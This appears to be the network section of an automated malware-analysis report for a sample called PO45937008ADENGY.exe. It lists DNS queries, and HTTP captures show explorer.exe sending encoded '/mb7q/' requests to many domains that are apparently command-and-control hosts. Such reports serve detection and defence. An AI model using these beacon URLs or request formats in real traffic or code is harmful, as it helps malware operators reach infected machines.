Apr 8, 2021 13:30:10.921067953 CEST  63153        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:10.934398890 CEST  53           63153      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:12.116672993 CEST  52991        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:12.129201889 CEST  53           52991      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:13.917656898 CEST  53700        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:13.929677010 CEST  53           53700      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:15.172684908 CEST  51726        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:15.185151100 CEST  53           51726      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:16.224628925 CEST  56794        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:16.238075018 CEST  53           56794      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:17.248979092 CEST  56534        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:17.261476994 CEST  53           56534      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:18.722178936 CEST  56627        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:18.735626936 CEST  53           56627      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:21.003348112 CEST  56621        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:21.016817093 CEST  53           56621      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:23.643181086 CEST  63116        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:23.655811071 CEST  53           63116      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:24.777617931 CEST  64078        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:24.790734053 CEST  53           64078      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:30.193873882 CEST  64801        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:30.206377029 CEST  53           64801      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:31.343394041 CEST  61721        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:31.379508018 CEST  53           61721      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:42.384252071 CEST  51255        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:42.404385090 CEST  53           51255      8.8.8.8          192.168.2.4
Apr 8, 2021 13:30:51.828886986 CEST  61522        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:30:51.871371031 CEST  53           61522      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:01.028156996 CEST  52337        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:01.126770020 CEST  53           52337      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:01.450838089 CEST  55046        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:01.492580891 CEST  53           55046      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:01.603812933 CEST  49612        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:01.617043972 CEST  53           49612      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:02.062634945 CEST  49285        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:02.212533951 CEST  53           49285      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:02.612077951 CEST  50601        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:02.617250919 CEST  60875        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:02.631309986 CEST  53           60875      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:02.639549971 CEST  53           50601      8.8.8.8          192.168.2.4
Apr 8, 2021 13:31:03.093561888 CEST  56448        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:31:03.229572058 CEST  53           56448      8.8.8.8          192.168.2.4
                                                                                                    Apr 8, 2021 13:31:03.842832088 CEST5917253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:03.972584009 CEST53591728.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:04.413518906 CEST6242053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:04.430625916 CEST53624208.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:05.123347998 CEST6057953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:05.136368036 CEST53605798.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:06.643285990 CEST5018353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:06.752841949 CEST53501838.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:06.799638987 CEST6153153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:06.812411070 CEST53615318.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:07.300843000 CEST4922853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:07.314244032 CEST53492288.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:10.546406031 CEST5979453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:10.564167976 CEST53597948.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:11.974248886 CEST5591653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:12.117747068 CEST53559168.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:17.383276939 CEST5275253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:17.496551991 CEST53527528.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:22.644455910 CEST6054253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:22.701051950 CEST53605428.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:27.764228106 CEST6068953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:28.055814981 CEST53606898.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:33.822031975 CEST6420653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:33.859922886 CEST53642068.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:39.644998074 CEST5090453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:39.678711891 CEST53509048.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:50.041105032 CEST5752553192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:50.089991093 CEST53575258.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:52.195184946 CEST5381453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:52.229252100 CEST53538148.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:53.995805979 CEST5341853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:54.021899939 CEST53534188.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:55.224247932 CEST6283353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:55.571523905 CEST53628338.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:01.115739107 CEST5926053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:01.152175903 CEST53592608.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:06.329305887 CEST4994453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:06.359285116 CEST53499448.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:11.441346884 CEST6330053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:11.485353947 CEST53633008.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:32:16.629407883 CEST6144953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:32:16.664383888 CEST53614498.8.8.8192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 13:30:05.109535933 CEST | 192.168.2.4 | 8.8.8.8 | 0xe51d | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 13:30:05.314856052 CEST | 192.168.2.4 | 8.8.8.8 | 0x416e | Standard query (0) | myliverpoolnews.cf | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:01.450838089 CEST | 192.168.2.4 | 8.8.8.8 | 0xfd14 | Standard query (0) | www.pradnyanamaya.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:06.643285990 CEST | 192.168.2.4 | 8.8.8.8 | 0xe68c | Standard query (0) | www.hepimizdostuz.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:11.974248886 CEST | 192.168.2.4 | 8.8.8.8 | 0x151a | Standard query (0) | www.hnchotels.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:17.383276939 CEST | 192.168.2.4 | 8.8.8.8 | 0x925c | Standard query (0) | www.bookitstaugustine.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:22.644455910 CEST | 192.168.2.4 | 8.8.8.8 | 0x93bd | Standard query (0) | www.beyju.store | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:27.764228106 CEST | 192.168.2.4 | 8.8.8.8 | 0xd41f | Standard query (0) | www.szmsbk.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:33.822031975 CEST | 192.168.2.4 | 8.8.8.8 | 0x818b | Standard query (0) | www.accessibleageing.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:39.644998074 CEST | 192.168.2.4 | 8.8.8.8 | 0x7b27 | Standard query (0) | www.theskineditco.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:50.041105032 CEST | 192.168.2.4 | 8.8.8.8 | 0x901a | Standard query (0) | www.thelandcle.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:55.224247932 CEST | 192.168.2.4 | 8.8.8.8 | 0x683a | Standard query (0) | www.tuyensinhhaiphong.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:01.115739107 CEST | 192.168.2.4 | 8.8.8.8 | 0xb9f0 | Standard query (0) | www.merkuryindustries.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:06.329305887 CEST | 192.168.2.4 | 8.8.8.8 | 0x5ea4 | Standard query (0) | www.belatopapparel.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:11.441346884 CEST | 192.168.2.4 | 8.8.8.8 | 0xbd6d | Standard query (0) | www.helpmewithmyenergy.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:16.629407883 CEST | 192.168.2.4 | 8.8.8.8 | 0x4a28 | Standard query (0) | www.softballlyfe.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 13:30:05.163789034 CEST | 8.8.8.8 | 192.168.2.4 | 0xe51d | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:30:05.163789034 CEST | 8.8.8.8 | 192.168.2.4 | 0xe51d | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:30:05.337465048 CEST | 8.8.8.8 | 192.168.2.4 | 0x416e | No error (0) | myliverpoolnews.cf | | 104.21.56.119 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:30:05.337465048 CEST | 8.8.8.8 | 192.168.2.4 | 0x416e | No error (0) | myliverpoolnews.cf | | 172.67.150.212 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:01.492580891 CEST | 8.8.8.8 | 192.168.2.4 | 0xfd14 | No error (0) | www.pradnyanamaya.com | pradnyanamaya.github.io | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:01.492580891 CEST | 8.8.8.8 | 192.168.2.4 | 0xfd14 | No error (0) | pradnyanamaya.github.io | | 185.199.108.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:01.492580891 CEST | 8.8.8.8 | 192.168.2.4 | 0xfd14 | No error (0) | pradnyanamaya.github.io | | 185.199.109.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:01.492580891 CEST | 8.8.8.8 | 192.168.2.4 | 0xfd14 | No error (0) | pradnyanamaya.github.io | | 185.199.110.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:01.492580891 CEST | 8.8.8.8 | 192.168.2.4 | 0xfd14 | No error (0) | pradnyanamaya.github.io | | 185.199.111.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:06.752841949 CEST | 8.8.8.8 | 192.168.2.4 | 0xe68c | No error (0) | www.hepimizdostuz.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:06.752841949 CEST | 8.8.8.8 | 192.168.2.4 | 0xe68c | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | 3.223.115.185 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:12.117747068 CEST | 8.8.8.8 | 192.168.2.4 | 0x151a | No error (0) | www.hnchotels.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:12.117747068 CEST | 8.8.8.8 | 192.168.2.4 | 0x151a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 52.15.160.167 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:12.117747068 CEST | 8.8.8.8 | 192.168.2.4 | 0x151a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.14.206.30 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:12.117747068 CEST | 8.8.8.8 | 192.168.2.4 | 0x151a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.13.255.157 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:17.496551991 CEST | 8.8.8.8 | 192.168.2.4 | 0x925c | No error (0) | www.bookitstaugustine.com | bookitstaugustine.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:17.496551991 CEST | 8.8.8.8 | 192.168.2.4 | 0x925c | No error (0) | bookitstaugustine.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:22.701051950 CEST | 8.8.8.8 | 192.168.2.4 | 0x93bd | No error (0) | www.beyju.store | onstatic-pt.setupdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:22.701051950 CEST | 8.8.8.8 | 192.168.2.4 | 0x93bd | No error (0) | onstatic-pt.setupdns.net | | 81.88.57.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:28.055814981 CEST | 8.8.8.8 | 192.168.2.4 | 0xd41f | No error (0) | www.szmsbk.com | | 154.210.110.99 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:33.859922886 CEST | 8.8.8.8 | 192.168.2.4 | 0x818b | No error (0) | www.accessibleageing.com | accessibleageing.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:33.859922886 CEST | 8.8.8.8 | 192.168.2.4 | 0x818b | No error (0) | accessibleageing.com | | 166.62.28.107 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:39.678711891 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b27 | No error (0) | www.theskineditco.com | ext-sq.squarespace.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:39.678711891 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b27 | No error (0) | ext-sq.squarespace.com | | 198.185.159.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:39.678711891 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b27 | No error (0) | ext-sq.squarespace.com | | 198.49.23.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:39.678711891 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b27 | No error (0) | ext-sq.squarespace.com | | 198.185.159.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:39.678711891 CEST | 8.8.8.8 | 192.168.2.4 | 0x7b27 | No error (0) | ext-sq.squarespace.com | | 198.49.23.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:50.089991093 CEST | 8.8.8.8 | 192.168.2.4 | 0x901a | No error (0) | www.thelandcle.com | thelandcle.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:50.089991093 CEST | 8.8.8.8 | 192.168.2.4 | 0x901a | No error (0) | thelandcle.com | | 85.17.172.1 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:31:55.571523905 CEST | 8.8.8.8 | 192.168.2.4 | 0x683a | No error (0) | www.tuyensinhhaiphong.com | tuyensinhhaiphong.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:31:55.571523905 CEST | 8.8.8.8 | 192.168.2.4 | 0x683a | No error (0) | tuyensinhhaiphong.com | | 123.31.43.181 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:01.152175903 CEST | 8.8.8.8 | 192.168.2.4 | 0xb9f0 | No error (0) | www.merkuryindustries.com | merkuryindustries.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:32:01.152175903 CEST | 8.8.8.8 | 192.168.2.4 | 0xb9f0 | No error (0) | merkuryindustries.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:06.359285116 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ea4 | No error (0) | www.belatopapparel.xyz | | 172.67.132.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:06.359285116 CEST | 8.8.8.8 | 192.168.2.4 | 0x5ea4 | No error (0) | www.belatopapparel.xyz | | 104.21.4.167 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:11.485353947 CEST | 8.8.8.8 | 192.168.2.4 | 0xbd6d | No error (0) | www.helpmewithmyenergy.com | helpmewithmyenergy.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:32:11.485353947 CEST | 8.8.8.8 | 192.168.2.4 | 0xbd6d | No error (0) | helpmewithmyenergy.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:32:16.664383888 CEST | 8.8.8.8 | 192.168.2.4 | 0x4a28 | No error (0) | www.softballlyfe.com | softballlyfe.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:32:16.664383888 CEST | 8.8.8.8 | 192.168.2.4 | 0x4a28 | No error (0) | softballlyfe.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• myliverpoolnews.cf
• www.pradnyanamaya.com
• www.hepimizdostuz.com
• www.hnchotels.com
• www.bookitstaugustine.com
• www.beyju.store
• www.szmsbk.com
• www.accessibleageing.com
• www.theskineditco.com
• www.thelandcle.com
• www.tuyensinhhaiphong.com
• www.merkuryindustries.com
• www.belatopapparel.xyz
• www.helpmewithmyenergy.com
• www.softballlyfe.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.449726172.67.150.21280C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:30:05.222027063 CEST752OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html HTTP/1.1
                                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                                    Host: myliverpoolnews.cf
                                                                                                    Connection: Keep-Alive
                                                                                                    Apr 8, 2021 13:30:05.302162886 CEST753INHTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:30:05 GMT
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Cache-Control: max-age=3600
                                                                                                    Expires: Thu, 08 Apr 2021 12:30:05 GMT
                                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BCA8795F5D846C5CAD40FE94B65D663D.html
                                                                                                    cf-request-id: 0952d82f380000082c8c058000000001
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=T8Iq3E0fgv9XVgEL%2BW%2Fx6URbQDC2HOIVfFl4ypcGy0SMozUhsd64DoOdOuy3MOdT17Ds%2F7xqiJFljNxbOh2mcHUtqzzJjkYcM57UcdkLXF63gFk%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 63cb295ec9b4082c-CDG
                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    1192.168.2.449745185.199.108.15380C:\Windows\explorer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    Apr 8, 2021 13:31:01.519802094 CEST2444OUTGET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ HTTP/1.1
                                                                                                    Host: www.pradnyanamaya.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:01.627937078 CEST2445INHTTP/1.1 301 Moved Permanently
                                                                                                    Server: GitHub.com
                                                                                                    Content-Type: text/html
                                                                                                    Location: https://www.pradnyanamaya.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=YnLga1qUVPXAwXm8Xnef5U/tzJanlVt5XSiXVkHKK7yNMqf2xcLe6bk7VgYZWvBkjWWZ
                                                                                                    X-GitHub-Request-Id: 3480:11CCF:E7C81:10670B:606EE975
                                                                                                    Content-Length: 162
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Thu, 08 Apr 2021 11:31:01 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    Age: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: cache-mxp6951-MXP
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1617881462.529324,VS0,VE92
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Fastly-Request-ID: 1b888645c815d23ffbaaee603e3cc99ea950b580
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    10 | 192.168.2.4 | 49771 | 123.31.43.181 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:31:55.836993933 CEST | 6414 | OUT | GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ HTTP/1.1
                                                                                                    Host: www.tuyensinhhaiphong.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:31:56.099909067 CEST | 6415 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:31:55 GMT
                                                                                                    Server: Apache/2
                                                                                                    Location: https://www.tuyensinhhaiphong.com/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ
                                                                                                    Content-Length: 346
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.tuyensinhhaiphong.com/mb7q/?1bhta6=SXxhAn0Xl&amp;yN60IZO0=l0uTrHgE4dX2CW6Jm11j3gK8Y/IcSuDEElYWgJQkj1du3DAYA3t1OAmIJu7yCFi9CsnQ">here</a>.</p></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    11 | 192.168.2.4 | 49772 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:32:01.167972088 CEST | 6417 | OUT | GET /mb7q/?yN60IZO0=a++sXVDjlFcB+laA3tgwrXcpuU3gANSGBltEKWMQhUjV/pCI9+JHBzUzdG3AEbQkWVAu&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.merkuryindustries.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:01.286478996 CEST | 6417 | IN | HTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:32:01 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
                                                                                                    ETag: "6063a886-113"
                                                                                                    Via: 1.1 google
                                                                                                    Connection: close
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    12 | 192.168.2.4 | 49773 | 172.67.132.70 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:32:06.389939070 CEST | 6418 | OUT | GET /mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ HTTP/1.1
                                                                                                    Host: www.belatopapparel.xyz
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:06.432296991 CEST | 6419 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                    Date: Thu, 08 Apr 2021 11:32:06 GMT
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=3600
                                                                                                    Expires: Thu, 08 Apr 2021 12:32:06 GMT
                                                                                                    Location: https://www.belatopapparel.xyz/mb7q/?1bhta6=SXxhAn0Xl&yN60IZO0=Fzfm3a0XdlsnDkSWJpXlhrCLV6cUJcC1/JgJIuUu2jl9+pI7KEKz6GYJxWtv8ndSN9vJ
                                                                                                    cf-request-id: 0952da08880000087b6e211000000001
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=295THSnQkzShTcX6%2BUaJWNC2pIbBYJXTNOypbgVOoL5zUmgUDp%2BEFEXYXVes3zRzyJyTirUEwdM3kaTvstmq%2BTK%2FDHqeLTXwT3EqYkJpD45OEk2rkKF6"}],"max_age":604800,"group":"cf-nel"}
                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 63cb2c540d12087b-CDG
                                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                    13 | 192.168.2.4 | 49774 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                                                    Apr 8, 2021 13:32:11.499423027 CEST | 6420 | OUT | GET /mb7q/?yN60IZO0=JkR/9GwueQDu2AwlHCPTEGTZaRQMZ19kAB6Pon410vUfaRtwZx2A0sBIx1wpZTt7VNCf&1bhta6=SXxhAn0Xl HTTP/1.1
                                                                                                    Host: www.helpmewithmyenergy.com
                                                                                                    Connection: close
                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                    Data Ascii:
                                                                                                    Apr 8, 2021 13:32:11.618187904 CEST | 6421 | IN | HTTP/1.1 403 Forbidden
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 08 Apr 2021 11:32:11 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 275
